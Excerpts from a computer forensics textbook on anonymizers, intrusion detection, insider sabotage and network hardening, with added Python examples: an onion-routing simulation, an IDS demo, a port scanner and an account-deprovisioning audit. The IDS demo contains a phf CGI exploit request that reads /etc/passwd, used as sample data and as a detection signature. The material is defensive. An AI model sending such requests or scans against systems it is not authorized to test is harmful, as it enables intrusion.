in Germany, has dabbled in, but not done digital forensics work in the past
...
You always miss something
...
In
fact, the detectives produced several leads to the identity of the culprit
...
Such on-line vandals are
extremely common
...
It’s a threat that everyone faces
...
The contest also helped illuminate why securing a computer is more cost-effective than hiring consultants to come in and do the detective work afterward
...
The costs of such investigations can easily
amount to $63,000 per computer
...
Companies
also tend to balk at agreeing to that kind of expense when there is no guaranteed payoff
...
If you just reinstall the system, do you know if you have plugged the hole that
allowed the attacker to get in? Most of the time, such quick fixes just mean the attacker
gets another shot at the system
...
Multiple intrusions are occurring all over the place
...
The next project would also focus on either a Solaris or Windows NT/2000,
XP, or 2003 computer
...
One of
these is legislation that increases the ability of federal agencies to intercept Internet
traffic
...
Web anonymizers allow people to visit Web sites without disclosing their identities to the owner of the Web site, or even a local administrator who can log the
URLs that a user visits
...
Anonymity has its place in a free society, and personal rights and freedoms
shouldn’t be collateral victims of terrorist attacks
...
This section explains how
anonymization works on the Internet and why this is important in the face of increasing privacy concerns
...
When the
packet is received, the source address becomes the destination address in the reply
packet
...
Worse, spoofing your source address is a lousy technique for anonymity, as most application protocols require a
completed transmission control protocol (TCP) connection before exchanging any
information
...
Most firewalls translate internal addresses
into external addresses, most commonly through network address translation
(NAT)
...
This capability is built into Web
browsers, which permits you to specify the IP address and the proxy you wish to
use
...
The proxy relays for you transparently
...
And
the owner of the Web server still has information about you—for example, the type
of Web browser you’re using, the source IP address, the URL requested, any referring page, as well as the source operating system, and sometimes the type of PC
...
This information may include
your system’s real source IP address, which is accessible to JavaScript programs
...
This research
formed the basis for the Freedom Network and may show up in other systems for
anonymity as well
...
You connect to this server via secure sockets layer (SSL) so
that anyone sniffing the connection can only see that you’re visiting an anonymizer,
and not your final destination site, which is encrypted
...
In the early 1990s, a site in Finland, anon
...
fi, provided an anonymous remailer
...
That works well as long as the
software manages to remove all the headers and you don’t include revealing information in the email you send (for example, including an automatic signature file at
the end of your email that, consequently, identifies you)
...
Therefore, Penet had to keep
track of the mapping between your anonymous email address and your real one
...
If the proxy doesn’t even know your real source address, how can it successfully
relay for you? There have been several approaches to this problem, and one of the
most recent (as previously discussed) is Onion Routing
...
Each of these proxies runs the same software, which not only relays your packets but also encrypts them
...
This is where the “onion” comes in
...
Once this layer of encryption is removed, the packet is sent to its real
destination
...
This
layer includes the address of the last router in the list, and gets encrypted with the
second to last router’s key
...
There should be at least six routers to ensure confidentiality
...
Your Onion
Router must also be a full participant in the network, so that other Onion Routers
can use it
...
Onion Routers present another potential problem
...
This attacker (or snoop) can then track traffic patterns
...
fbi
...
The snoop sees traffic leaving
your Onion Router, bound for another Onion Router, with a certain packet size
...
Then the snoop can deduce that this packet came from your network, based on the sizes and the timing of
the packets between routers
...
Thus, a snoop cannot make simple deductions about the size
and timing of packets
...
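The layering described above, as an added Python simulation that is not part of the original text: the sender wraps the payload in one layer per router, each layer beginning with the address of the next hop and encrypted under that router's key, and each router strips exactly one layer, learning only where to forward next. Two details from the text are modelled: every cell on the wire has the same size (each router re-pads after removing its header), so a snoop comparing sizes between routers learns nothing, and a per-router sequence number keeps the keystream from repeating. The per-router keys, the HMAC-SHA256 keystream that stands in for a real stream cipher, and all router and destination names are constructed for this example.

```python
import hashlib
import hmac
import secrets

CELL = 256   # every cell on the wire is exactly this many bytes
ADDR = 8     # fixed-width next-hop address field at the front of each layer

def keystream(key, seq, length):
    """Keystream from HMAC-SHA256(key, seq || block counter). Constructed stand-in
    for a real stream cipher; seq must never repeat under one key."""
    out, block = b"", 0
    while len(out) < length:
        out += hmac.new(key, seq.to_bytes(8, "big") + block.to_bytes(4, "big"),
                        hashlib.sha256).digest()
        block += 1
    return out[:length]

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def addr(name):
    if len(name) > ADDR:
        raise ValueError("address too long for the fixed header field")
    return name.encode().ljust(ADDR, b"\0")

class OnionRouter:
    def __init__(self, name):
        self.name = name
        self.key = secrets.token_bytes(32)  # assumed shared with the sender (constructed)
        self.seq = 0                        # cells seen so far; keeps the keystream fresh

    def peel(self, cell):
        """Remove this router's layer. Returns (next hop, cell to forward)."""
        if len(cell) != CELL:
            raise ValueError("malformed cell")
        plain = xor(cell, keystream(self.key, self.seq, CELL))
        self.seq += 1
        next_hop = plain[:ADDR].rstrip(b"\0").decode()
        # Drop our header and append random filler so the forwarded cell is still CELL
        # bytes; the filler lies beyond the inner layer's data and is ignored downstream.
        return next_hop, plain[ADDR:] + secrets.token_bytes(ADDR)

def build_onion(route, destination, payload, seq):
    """Wrap payload for route[0] .. route[-1] (the exit). Returns one CELL-byte cell."""
    inner_len = CELL - ADDR * (len(route) - 1)
    body = addr(destination) + len(payload).to_bytes(2, "big") + payload
    if len(body) > inner_len:
        raise ValueError("payload does not fit in one cell")
    body += secrets.token_bytes(inner_len - len(body))
    layer = xor(body, keystream(route[-1].key, seq, len(body)))      # exit router's layer
    for i in range(len(route) - 2, -1, -1):                           # wrap outward
        plain = addr(route[i + 1].name) + layer
        layer = xor(plain, keystream(route[i].key, seq, len(plain)))
    return layer

def transit(route, cell):
    """Forward a cell hop by hop. Returns (destination, payload, cell sizes seen per hop)."""
    sizes = []
    for i, router in enumerate(route[:-1]):
        sizes.append(len(cell))
        next_hop, cell = router.peel(cell)
        if next_hop != route[i + 1].name:
            raise RuntimeError("layer addressed to the wrong router")
    sizes.append(len(cell))
    destination, rest = route[-1].peel(cell)
    n = int.from_bytes(rest[:2], "big")
    return destination, rest[2:2 + n], sizes

if __name__ == "__main__":
    route = [OnionRouter("entry"), OnionRouter("middle"), OnionRouter("exit")]
    cell = build_onion(route, "web", b"GET / HTTP/1.0", seq=0)
    print(transit(route, cell))   # ('web', b'GET / HTTP/1.0', [256, 256, 256])
```

The entry router's layer names only "middle", the middle router's layer names only "exit", and only the exit layer carries the destination, so no router holds the full path; the size list shows what a passive observer at each link would record.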
Onion Routing is only one approach to the problem of network anonymity
...
research
...
com) tried a different approach called
Crowds
...
Each Crowd proxy is called a “jondo” (think “John
Doe”)
...
This speeds up processing by reducing the amount of time required to handle encryption
...
This information is discarded at the end of each connection
but could be used to track users
...
You could
either add a plug-in to Internet Explorer or patch your Linux kernel so that your system actually becomes an entry point in the network, with sites other than the one
run by ZeroKnowledge participating as routers
...
As of this writing, the Anonymizer (http://www
...
com) is still up and
running but functions as a proxy; it also strips identifying information from your
requests
...
You can also acquire software that acts as a local proxy for Web requests
...
Who Needs It?
The Onion Routing project closed down in January 2000, after processing over 30
million requests
...
Still, government agencies form one of the largest groups of anonymizer users
...
Such uses of anonymizers are legitimate and actually of value to national security
...
Anonymizers also have a place for nongovernmental users
...
For example, someone with AIDS could
feel free to search the Web without revealing his or her identity
...
One can only hope that the
rush to embrace national security in the United States doesn’t have additional casualties—especially ones that actually enhance national security
...
Perhaps no other security device has
done its job so well and then been reviled so roundly for doing it
...
That was both bad and good news
...
This required placing IDSs at key locations
on the network, such as at firewalls, switches, routers, Web servers, databases, and
other back-end devices further into the enterprise—a straightforward process
...
They cried “wolf”
too often, reporting false alarms by the droves
...
The IDS products on the market are now bigger, better, and faster and offer much
more to those charged with protecting network resources
...
They have also increased the performance of their devices, which can now keep up
with 100 Mbit/sec networks
...
Just as importantly, the number of attacks on networking systems is growing
...
For example, the nonprofit CERT
Coordination Center received reports on 44,304 security incidents in 2004 (the
most recent year for which its incident totals are available)
...
The most virulent threat to emerge from the hacker jungle, though, is clearly
DoS and distributed DoS (DDoS) attacks, the number and variety of which have increased dramatically according to security organizations
...
The goal of such attacks is to incapacitate a device or network by flooding it with traffic, so that legitimate external users can’t reach those resources—all without hacking password files or stealing sensitive data
...
NIPC identified 500 victims in 33 U.S. states who were attacked by organized groups in Eastern Europe (particularly Russia and Ukraine), which took advantage of vulnerabilities in servers running unpatched versions of Microsoft’s Windows NT operating system
...
In this case, the intruders didn’t use the information maliciously,
per se, because they didn’t attempt to make purchases with the stolen cards
...
A Second Look
It’s thus time for network professionals who gave up on the IDS a few years ago to
go looking again
...
Frost & Sullivan, for example, predicts that the market for intrusion detection software will increase from $665
...
8 million in 2006 and $998
...
Another research house, IDC (http://www
...
com), paints a slightly rosier picture, saying that
the IDS market stands at $1 billion in 2005 and will grow to $5
...
Several developments have moved the IDS back into prominence
...
The charge is led by many of the usual vendor suspects—Cisco Systems [5], Internet Security Systems (ISS), Intrusion
...
The latter list includes
CyberSafe, Entercept Security Technologies, and Enterasys Networks
...
In this area are Activis, Exodus Communications, OneSecure, NetSolve,
RedSiren Technologies, Riptech, and Ubizen
...
Arguably, the most critical is the growing use of anomaly-based
intrusion detection by vendors of network-based IDSs
...
These signature-based systems work much like an anti-virus package (detecting a known “bad” pattern generates an alarm) and are effective at discovering known attack patterns
...
First, they can’t see inside encrypted packets—the encryption essentially
hides the packet’s contents from the IDS, leaving it blind to assaults
...
Just as an anti-virus package can’t protect against a new virus until its vendor ships updated definitions, an IDS can’t detect a new attack until its vendor updates the signature files—and it’s not clear how many vendors have figured that out
...
656
Computer Forensics, Second Edition
These devices analyze the data transfer among IP devices, permitting them to discern normal traffic from suspicious activity without pattern or signature matching
...
They only care about how a session took place, where the connection was made, at what time, and how rapidly (is a suspicious connection to one
host followed by a suspicious connection to another host?)
...
The chief difficulty of this approach is how to baseline—
to know what’s normal traffic as opposed to deviant
...
An anomaly can be compared against a signature, and if the anomaly doesn’t show up on multiple probes, you ignore it
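The two detection styles described above, side by side, as an added example that is not code from the original text: a signature matcher that raises an alarm on a known payload pattern, and an anomaly detector that never looks at payload bytes, only at how widely each source fans out per time window, with the threshold learned from a quiet baseline period and single-window anomalies ignored. The flow records, addresses, payloads and signature strings are constructed for illustration.

```python
"""Signature matching beside anomaly (baseline) detection, run over constructed flow records.

Added example: the records, IPs and payloads below are constructed for illustration and are
not captures from the original text or any real network.
"""
from collections import defaultdict, namedtuple
from statistics import mean, pstdev

Flow = namedtuple("Flow", "ts src dst dport payload")  # ts = seconds since capture start

# Constructed sample. Seconds 0-119 are a quiet baseline period; from 120 s on there is
# one exploit attempt with a known payload and one host fanning out across many ports.
FLOWS = [
    Flow(0,   "10.0.0.5", "10.0.0.20", 80,  b"GET /index.html"),
    Flow(8,   "10.0.0.6", "10.0.0.20", 25,  b"EHLO mail.example"),
    Flow(15,  "10.0.0.5", "10.0.0.21", 110, b"USER alice"),
    Flow(70,  "10.0.0.6", "10.0.0.20", 80,  b"GET /about.html"),
    Flow(75,  "10.0.0.5", "10.0.0.20", 80,  b"GET /news.html"),
    Flow(100, "10.0.0.7", "10.0.0.21", 143, b"a1 LOGIN bob x"),
    Flow(130, "10.0.0.5", "10.0.0.20", 80,  b"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd"),
    Flow(131, "10.0.0.9", "10.0.0.20", 21,  b""),
    Flow(132, "10.0.0.9", "10.0.0.20", 23,  b""),
    Flow(133, "10.0.0.9", "10.0.0.20", 25,  b""),
    Flow(134, "10.0.0.9", "10.0.0.20", 53,  b""),
    Flow(135, "10.0.0.9", "10.0.0.20", 80,  b""),
    Flow(136, "10.0.0.9", "10.0.0.20", 110, b""),
    Flow(190, "10.0.0.9", "10.0.0.21", 21,  b""),
    Flow(191, "10.0.0.9", "10.0.0.21", 23,  b""),
    Flow(192, "10.0.0.9", "10.0.0.21", 25,  b""),
    Flow(193, "10.0.0.9", "10.0.0.21", 80,  b""),
    Flow(194, "10.0.0.9", "10.0.0.21", 161, b""),
    Flow(200, "10.0.0.6", "10.0.0.20", 80,  b"GET /contact.html"),
]

# Signature rules: a known "bad" byte pattern in the payload raises an alarm. Blind to
# anything not already in this table, and blind to encrypted payloads.
SIGNATURES = {"phf-cgi": b"/cgi-bin/phf", "passwd-read": b"/etc/passwd"}


def signature_alerts(flows):
    """Return (ts, src, rule) for every payload that contains a known pattern."""
    return [(f.ts, f.src, rule) for f in flows
            for rule, pattern in SIGNATURES.items() if pattern in f.payload]


def fanout_per_window(flows, window):
    """Map (src, window_index) -> set of (dst, dport) the source touched in that window.
    This looks only at who talked to whom, where and when, never at payload bytes."""
    table = defaultdict(set)
    for f in flows:
        table[(f.src, f.ts // window)].add((f.dst, f.dport))
    return table


def build_baseline(flows, window=60, k=3.0, floor=3):
    """Learn what 'normal' fan-out looks like from a quiet period: mean + k standard
    deviations of per-window (dst, port) counts, never below `floor` so that a very
    quiet baseline does not make every second connection an alert."""
    counts = [len(targets) for targets in fanout_per_window(flows, window).values()]
    return max(floor, mean(counts) + k * pstdev(counts))


def anomaly_alerts(flows, threshold, window=60, min_windows=2):
    """Report sources whose fan-out exceeds the baseline threshold in at least
    `min_windows` windows: an anomaly seen on a single probe is ignored."""
    over = defaultdict(list)
    for (src, w), targets in fanout_per_window(flows, window).items():
        if len(targets) > threshold:
            over[src].append((w, len(targets)))
    return {src: sorted(hits) for src, hits in over.items() if len(hits) >= min_windows}


def run(flows=FLOWS, baseline_end=120):
    """Train on the quiet period, then run both detectors over the live period."""
    quiet = [f for f in flows if f.ts < baseline_end]
    live = [f for f in flows if f.ts >= baseline_end]
    threshold = build_baseline(quiet)
    return {
        "threshold": threshold,
        "signature": signature_alerts(live),          # catches the phf exploit, misses the scan
        "anomaly": anomaly_alerts(live, threshold),   # catches the scan, misses the exploit
    }


if __name__ == "__main__":
    for key, value in run().items():
        print(key, value)
```

Run as written, the signature detector reports only the single exploit request (it has no rule for a port sweep) and the anomaly detector reports only the sweeping host 10.0.0.9 (one exploit request is not a fan-out). Neither sees everything, which is the argument for correlating both kinds of sensor.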
...
com, ISS, and Recourse Technologies are among the vendors that offer anomaly-based network IDS products
...
Beyond
that, they begin to drop packets and become less efficient
...
You can find products that will die in 400 Mbit/sec networks
...
Moving to Appliances
Another trend among IDS products is the network-based IDS appliance
...
Cisco’s Secure IDS, formerly known as the NetRanger, was among the first
such appliances, and IDC believes this makes Cisco the current leader in this area
...
com, and NFR Security (formerly Network
Flight Recorder), are also moving their IDS products into the appliance category
...
First, it eliminates many
of the performance issues involved in installing IDS software on a general-purpose
PC
...
Second, the appliance is a controlled environment, built to
vendor specifications, so the IDS software can be configured specifically for the application
...
Finally, appliance-based IDSs
give plug-and-play capabilities to IT departments in multilocation companies and to
service providers
...
IDS vendors have developed recent products that merge the capabilities of
host- and network-based systems into a single management platform
...
Correlating data from multiple network sources lowers the incidence of false positives and enables network security personnel to view traffic from a higher level
...
Outsourcing Intrusion Detection
Advances in IDS technology notwithstanding, organizations worried about unauthorized intrusions and DoS attacks should also consider outsourcing their intrusion detection needs
...
Not the least
of these is cost
...
It would typically require five employees,
working three eight-hour shifts (with extra staffing for vacations, sickness, and the
like), to handle the 24-by-7 needs of an IDS-monitoring program
...
Thus, it’s important to sit down and perform a return on investment (ROI)
study
...
The MSSPs tout the level of security expertise among their employees, claiming that this expertise enables them to better handle the task of deciphering often
arcane IDS logs and alarms that befuddle typical IT employees
...
MSSPs Riptech and
OneSecure, for example, both indicate that the technology they’ve developed in this
area differentiates them from others in the market
...
Caltarian’s software permits
the company to warn clients of attacks while they’re under attack, with recommendations to protect their networks in real time
...
No longer an overly chatty box
crying “wolf” too often, it now offers network managers an improved set of tools that
can finally help them fend off unwanted attacks from insiders and outsiders alike
...
Computers at many
agencies are riddled with security weaknesses
...
The increase in the number of root compromises, DoS attacks, network reconnaissance activities, destructive viruses, and malicious code, coupled with the advances in attack sophistication, pose a measurable threat to government systems
...
That’s up from 186 root compromises in 2002 and
332 in 2003
...
For at least five of the root compromises, officials were able to verify that access
had been obtained to sensitive information
...
The compromised data involves scientific and environmental studies
...
The
shortcomings have placed an enormous amount of highly sensitive data at risk of
inappropriate disclosure
...
If sensitive personal data about U.S. citizens is compromised, Americans are going to wake up angrier than you can possibly imagine
...
Also, many nations are developing information warfare capabilities as well as
adapting cyber crime tools
...
There is a whole new currency on the Internet that’s called the back door
...
One step the government could take to increase the security of its systems is to
focus more resources on improving education and training
...
They are in short supply, and they are expensive
...
A 1998 directive by President Clinton ordered all federal agencies to complete
a virtual bulletproofing of their IT systems from attack by May 2005, but officials
indicate that most agencies are behind in that work, and only a few are doing penetration testing
...
No one knows what
was done, and no one has a way of knowing what was done
...
Beyond fending off network intrusions and DoS attacks, companies must stave off threats of industrial espionage
...
Increasingly,
cyberthieves are raiding corporate servers, electronically stealing intellectual property, and using email to harass fellow employees, putting companies at risk for liability
...
9 billion annually
...
For many organizations, identifying, tracking, and
prosecuting these threats has become a full-time job
...
As previously explained, computer forensics is
the equivalent of surveying a crime scene or performing an autopsy on a victim
...
Although software tools can identify and document evidence, computer forensics is more than just technology and analysis
...
Divining Good Forensics
Obtaining a good digital fingerprint of a perpetrator requires that steps be taken to
preserve the electronic crime scene
...
Even booting up or shutting down a system runs the risk of
losing or overwriting data in memory and temporary files
...
Minimal handling preserves its integrity, so any disk investigation should begin by making a
copy of the original, using the least intrusive manner available
...
Ambient system data, such as swap files and unallocated disk space, and file “slack” (the unused space between the end of a file’s data and the end of its last allocated cluster, which may still hold remnants of earlier files) often hold interesting clues, including email histories, document fragments, Web browsing details, and computer usage time lines
...
Complying with the rules of evidence preservation and upholding the integrity of the process will help prevent any future challenges of admissibility
...
Data communication analysis typically includes network intrusion detection, data preservation, and event
reconstruction
...
Doing so can reveal activities such as unauthorized network access, malicious data-packet monitoring, and any remote system
modifications
...
And no matter how
good the tools, the science of computer forensic discovery draws on multiple disciplines
...
Principles of cryptography
are also important for identifying data encryption and password-protection
schemes
...
For these reasons, it’s often wise to leave the process to the professionals
...
When selecting a forensic examiner, you should have several goals in mind:
Your candidate should be familiar with the intricacies of your particular operating
systems, know how to protect against data corruption and booby traps, and have a
history of court appearances and controls established to deal with evidentiary procedures, such as chain-of-custody
...
As storage capacities and network sizes continue to increase, so do
the means by which cyberthieves can circumvent security as well as the effort required to bring them to justice
...
How a Hacker Works
Obviously, knowing how the hacker’s mind works is only half of the battle
...
This section will look at some tips and tools
administrators can use to find and close those vulnerabilities before an attacker does
...
You can do this
with a sophisticated tool such as Visio, or you can use a less complex tool such as
Word
...
Once you’ve diagrammed your network, identify all the machines that are connected to the Internet, including routers,
switches, servers, and workstations
...
You want to pay close attention to machines that have a public
IP address on the Internet, because they’re the ones that will be scanned by hackers
...
With always-on access and a static IP, you are like a big bull’s-eye
sitting on the Internet waiting to get hit
...
If you have a Web server,
mail server, or other servers constantly connected to the Internet, your security responsibilities are even greater
...
A number of common ports are scanned and attacked:
FTP (21)
Telnet (23)
SMTP (25)
DNS (53)
HTTP (80)
POP3 (110)
NNTP (119)
IMAP (143)
SNMP (161)
You need to identify whether your servers are listening on any of these ports (the numbers above in parentheses), because each one is an exposed service that attackers routinely probe for known vulnerabilities
...
First, you can
implement firewall filtering
...
These firewalls open and close ports on an as-needed basis, rather than
permanently leaving a port open where it can be identified by one of the hackers’
port scans and then exploited
...
A third option is to install an intrusion-detection program that will
do much of the log file examination for you
...
The best way to do this is to use nmap,
a program that gives you a look at your network from a hacker-like perspective
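A minimal connect scanner for the port list above, as an added example and not a tool from the original text or a substitute for nmap: it probes each port with a full TCP connect, records whatever banner the service volunteers, and runs the probes concurrently. The throwaway local listener, its “220” banner and the use of 127.0.0.1 are constructed so the scanner can be exercised offline; in real use you point scan() at one of your own Internet-facing hosts. Note the caveat in the code about SNMP, which is UDP and invisible to a TCP probe.

```python
"""Connect-scan the commonly attacked ports from the text, with a throwaway local
listener so the scanner can be exercised offline.

Added example, not a tool from the original text. The fake service, its banner and
the use of 127.0.0.1 are constructed for the self-check; point scan() at one of your
own hosts for real use. nmap remains the tool of choice for anything beyond this."""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

# The ports listed in the text. SNMP (161) is a UDP service, so a TCP connect() probe
# will report it closed even when an agent is listening; it needs a UDP probe instead.
COMMON_PORTS = {21: "FTP", 23: "Telnet", 25: "SMTP", 53: "DNS", 80: "HTTP",
                110: "POP3", 119: "NNTP", 143: "IMAP", 161: "SNMP (UDP)"}


def probe(host, port, timeout=1.0):
    """Full TCP connect() probe. Returns (port, state, banner): 'open' with whatever the
    service volunteers in its first bytes, 'closed' on RST, 'filtered' on timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                banner = s.recv(128).decode("ascii", "replace").strip()
            except OSError:           # includes socket.timeout: service waits for us to speak
                banner = ""
            return port, "open", banner
    except ConnectionRefusedError:
        return port, "closed", ""
    except OSError:                   # timeout or unreachable: something is filtering
        return port, "filtered", ""


def scan(host, ports=None, workers=16, timeout=1.0):
    """Probe each port concurrently; returns {port: (state, banner)}."""
    ports = list(COMMON_PORTS) if ports is None else list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return {port: (state, banner) for port, state, banner in results}


def exposed(results):
    """The ports an attacker's scan would find listening, with service names where known."""
    return [(p, COMMON_PORTS.get(p, "?")) for p, (state, _) in sorted(results.items())
            if state == "open"]


# ---- constructed self-check: a fake FTP-style service on an ephemeral port ----
def start_fake_service(banner=b"220 ftp.example FTP server ready\r\n"):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:           # listener closed
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def reserve_closed_port():
    """Bind and immediately release an ephemeral port so we know one that is closed."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


def self_check():
    """Scan localhost for the common ports plus the fake service and a known-closed port."""
    srv, fake_port = start_fake_service()
    closed_port = reserve_closed_port()
    try:
        results = scan("127.0.0.1", list(COMMON_PORTS) + [fake_port, closed_port], timeout=0.5)
    finally:
        srv.close()
    return {
        "fake_open": results[fake_port][0] == "open",
        "banner_seen": results[fake_port][1].startswith("220"),
        "closed_closed": results[closed_port][0] == "closed",
        "exposed": exposed(results),
    }


if __name__ == "__main__":
    print(self_check())
```

A “filtered” result (timeout rather than RST) is itself information: it usually means a firewall is dropping the probe silently, which is what the stateful-filtering option above produces for ports you have not deliberately exposed.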
...
eeye
...
html)
...
This is an
expensive, yet valuable, product
...
insecure
...
Software Vulnerabilities
Hackers also often exploit software security problems
...
Thus, you
should take stock of all the software running on your Internet-exposed systems
...
You’ll want to check
these sites regularly and always keep your software up-to-date with the latest
patches
...
Security Expert Web Sites
In addition to staying on top of your vendors’ security updates and patches, you
should also stay current on the security risks and problems that are identified by security experts in the industry
...
Therefore, your systems could be vulnerable for a period
during which the hackers may know about it, but you don’t
...
atstake
...
403-security
...
THE PROBLEMS OF THE PRESENT
An IT worker faced federal criminal charges recently in U.S. District Court in
Miami for allegedly downloading a virus into his employer’s computer system,
crashing the network for nearly two full days
...
Another case is getting ready to go to trial in Las Vegas, and yet
another was wrapped up with a guilty verdict in New Hampshire (see sidebar, “Insider Accounts”)
...
7 million workers were
laid off according to the U.S.
...
Even scarier is the question of
how many of those workers still have active accounts on the networks of their former employers
...
There are
also remote access holes with virtual private network (VPN) passwords and dial-in
accounts
...
A recent series of high-profile network sabotage cases show that vengeful
employees can wreak high-tech havoc
...
Security experts recommend a combination of procedures, policies, and
automation to combat the threat
...
If you are a chief information officer (CIO) and are currently using a manual process, fundamentally you have no way to know if the process of deprovisioning worked
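What an automated deprovisioning check looks like, as an added example that is not from the original text: it reconciles HR’s separation list against directory accounts, VPN and dial-in credentials, and shared passwords, and separates housekeeping gaps (an account nobody disabled) from evidence that needs an investigator (a login after the employee’s last day). All names, dates and tables are constructed for the illustration.

```python
"""Automated deprovisioning check: reconcile HR separations against live accounts and
remote-access paths, flagging what a manual process can silently miss.

Added example with constructed data; the employee names, dates and account tables below
are invented for illustration and are not from the original text or any real directory."""
from datetime import date, datetime

# HR's list of separated employees and their last day (constructed).
TERMINATED = {"jdoe": date(2005, 3, 1), "rsmith": date(2005, 3, 15)}

# Directory accounts as exported from the domain (constructed).
ACCOUNTS = [
    {"user": "jdoe",   "enabled": True,  "last_login": datetime(2005, 3, 2, 23, 40)},
    {"user": "rsmith", "enabled": False, "last_login": datetime(2005, 3, 10, 9, 5)},
    {"user": "alee",   "enabled": True,  "last_login": datetime(2005, 3, 20, 8, 0)},
]

# Remote-access paths that live outside the directory and are easy to forget (constructed).
VPN_USERS = {"jdoe", "alee"}
DIALIN_USERS = {"rsmith"}

# Shared/generic credentials and who is known to have them (constructed). A shared
# terminal account is not tied to one employee, so nobody disables it on departure.
SHARED_CREDENTIALS = {"lab-terminal": {"jdoe", "alee"}}


def audit(terminated=TERMINATED, accounts=ACCOUNTS, vpn=VPN_USERS,
          dialin=DIALIN_USERS, shared=SHARED_CREDENTIALS):
    """Return findings as (subject, code, detail), sorted so the report is stable."""
    findings = []
    for acct in accounts:
        user = acct["user"]
        if user not in terminated:
            continue
        last_day = terminated[user]
        if acct["enabled"]:
            findings.append((user, "ENABLED",
                             f"account still enabled; separated {last_day}"))
        if acct["last_login"].date() > last_day:
            # Not just a housekeeping gap: someone used the credential after the last day.
            findings.append((user, "POST_TERMINATION_LOGIN",
                             f"logged in {acct['last_login']:%Y-%m-%d %H:%M}, after {last_day}"))
    for user in sorted(terminated):
        if user in vpn:
            findings.append((user, "VPN", "VPN credential still active"))
        if user in dialin:
            findings.append((user, "DIALIN", "dial-in account still active"))
    for cred, holders in shared.items():
        departed = sorted(holders & set(terminated))
        if departed:
            findings.append((cred, "SHARED_CREDENTIAL",
                             f"shared password known to departed {', '.join(departed)}; rotate it"))
    return sorted(findings)


def priority(findings):
    """Evidence of use after departure goes to incident response, not the help desk."""
    urgent = [f for f in findings if f[1] == "POST_TERMINATION_LOGIN"]
    routine = [f for f in findings if f[1] != "POST_TERMINATION_LOGIN"]
    return urgent, routine


if __name__ == "__main__":
    urgent, routine = priority(audit())
    for f in urgent:
        print("INVESTIGATE", *f)
    for f in routine:
        print("DISABLE/ROTATE", *f)
```

The point of running this on a schedule is that it answers the CIO’s question above: each run either returns nothing, which is the evidence that deprovisioning worked, or returns the specific account, VPN entry or shared password that the manual process missed.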
...
However, the process must also account for social engineering
...
For example, there was one case where a former Coast Guard employee
was able to hack into a database using a password given to her by an unsuspecting
coworker
...
The U.S. Secret Service, which splits its focus between protecting heads of state
and conducting criminal investigations, is handling twice as many cases involving insider attacks as it did in 2004
...
Eighty-three percent of the cases are from the inside or people who were formerly with an organization
...
It’s not a matter of if you’re going to be
attacked, but when you’re going to be attacked
...
An insider attack really gets the attention of the company, because an insider has access to all the critical systems
...
A company’s decision to protect itself isn’t just a technology decision
...
Grocer Victimized
In the Miami case previously mentioned, Herbert Pierre-Louis, a hardware engineer who worked in the IT department at Purity Wholesale Grocers, is being
charged with computer sabotage for the June 18, 1998, incident at the $2
...
The Assistant U.S. Attorney
indicated the damage was well over the $6,000 waterline that is one of the key factors making this a federal crime
...
In light of the economy and the downturn and layoffs, companies should pay
attention to this
...
That’s a lesson Omega Engineering’s Bridgeport, New Jersey, manufacturing
plant learned the hard way
...
Exacerbating the problem, Omega’s
only backup tape was missing
...
Company executives, in a 2001 trial in U.S. District Court in Newark,
New Jersey, indicated that the company had yet to fully recover
...
Omega’s former network administrator was charged with sabotaging the network he helped build
...
The judge later
set that verdict aside after a juror told the court she was unsure whether a piece of
information she had heard on television news had been factored into her verdict
...
A ruling is pending
...
That was the first federal criminal prosecution of computer sabotage
...
One of those cases charges
a network consultant with sabotaging the computer network at one of his clients,
Steinberg Diagnostic Medical Imaging in Las Vegas
...
The Assistant U.S. Attorney notes in
the indictment that the consultant allegedly hacked the system on three different
days between late February and early March of 2001
...
Both
the deal and the partnership fell through, and the consultant’s partner went to work
for Steinberg Diagnostic as a system administrator
...
The damage had to have added
up to at least $5,000 for the consultant to be charged with a federal offense
...
The worker pleaded guilty to
breaking into the system twice using a supervisor’s password (once the night he was
fired and again the next morning) to delete a total of 786 files, change user access
levels, and send emails to Bricsnet clients saying the company’s project center
would be temporarily or permanently shut down
...
Some of the destroyed files could not be restored
...
It
was malicious
...
How do you
quantify the impact when customers receive these kinds of damaging emails? You can’t
put a dollar amount on that
...
They terminated the worker’s password, logon, and user accounts
...
There was no
sense of foreboding
...
Certainly, Bricsnet had an extensive
security system in place, but they were always thinking of outside intrusion
...
Since the attack, Bricsnet has
re-evaluated its security system and limited network access
...
People took it personally
...
Outlook for the Future
Atlanta-based Internet Security Systems Inc
...
That’s right—drive-by hackers
...
To combat this
threat, which sounds like it could be a plot line from an upcoming James Bond film,
ISS recently drew the curtain on wireless local area network (WLAN) security software and consulting practices
...
Very
little exists in the way of security for wireless networks as compared to their wired
counterparts, LANs
...
The research firm said 90% of all enterprises in the United States
will have deployed a WLAN by 2006, an increase from 50% in 2003
...
Just as perpetrators such as hackers and crackers have done to wired networks,
they can assault WLANs through the same methods: unauthorized access points,
data interception, DoS attacks, peer-to-peer sabotage, and attacks on wireless laptops when they roam to public access points such as airports and hotels
...
This ignorance can
make the comfort of the firewall a false security blanket
...
Employees today are adding their own wireless access points to the backbone of their company’s network without the knowledge of their IT and security
staffs
...
SUMMARY
This chapter introduced numerous solutions for those of you who are conducting
advanced computer forensics, from using encryption for protection to hacking back with advanced hacker-tracking tools
...
Not true
...
The intruder could be a teen hoping to use your system to launch an attack on a Web site,
or a bitter ex-employee looking for payback
...
The feast is seemingly never-ending
...
Think your firewall will protect you?
Not always
...
Furthermore, protecting your network against hackers need not be a full-time
job
...
Computer forensics provides the methodology for investigating and documenting cyber crimes so they may be later tried in court
...
Also, tools for sifting digital media and detecting network intrusion have become easier to implement, but they still demand a sizeable time commitment and
cross-discipline knowledge for most situations
...
Conclusions
